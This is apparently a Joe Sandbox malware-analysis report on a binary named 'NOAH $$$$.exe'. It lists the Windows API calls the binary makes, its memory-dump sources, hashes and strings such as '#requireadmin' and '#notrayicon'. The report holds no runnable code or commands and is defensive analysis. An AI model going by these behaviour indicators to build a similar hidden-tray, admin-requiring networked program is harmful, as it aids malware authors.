                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 3613100350-2852464175
                                                                                                                                        • Opcode ID: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                                                                                                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                        • Opcode Fuzzy Hash: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                                                                                                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                        APIs
                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                        • String ID: close all
                                                                                                                                        • API String ID: 4174999648-3243417748
                                                                                                                                        • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                        • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1291720006-3916222277
                                                                                                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                        • String ID: 0$2
                                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                        • String ID: crts
                                                                                                                                        • API String ID: 586820018-3724388283
                                                                                                                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NOAH $$$$.exe,0040F545,C:\Users\user\Desktop\NOAH $$$$.exe,004A90E8,C:\Users\user\Desktop\NOAH $$$$.exe,?,0040F545), ref: 0041013C
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2326526234-1173974218
                                                                                                                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                        • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 321622961-2967466578
                                                                                                                                        • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                        • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                                        • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                                        • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                        • __lock.LIBCMT ref: 00417981
                                                                                                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                        • __lock.LIBCMT ref: 004179A2
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                        • String ID: KERNEL32.DLL$pI
                                                                                                                                        • API String ID: 637971194-197072765
                                                                                                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1938898002-0
                                                                                                                                        • Opcode ID: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                                                                                                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                        • Opcode Fuzzy Hash: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                                                                                                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                        • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                                                                                        • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3771399671-0
                                                                                                                                        • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                                        • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                                                                        • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                                        • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                        • _memmove.LIBCMT ref: 0044B555
                                                                                                                                        • _memmove.LIBCMT ref: 0044B578
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2737351978-0
                                                                                                                                        • Opcode ID: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                                                                                                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                        • Opcode Fuzzy Hash: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                                                                                                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                        APIs
                                                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                        • __getptd.LIBCMT ref: 00415253
                                                                                                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                        • _free.LIBCMT ref: 0041529E
                                                                                                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3638380555-0
                                                                                                                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
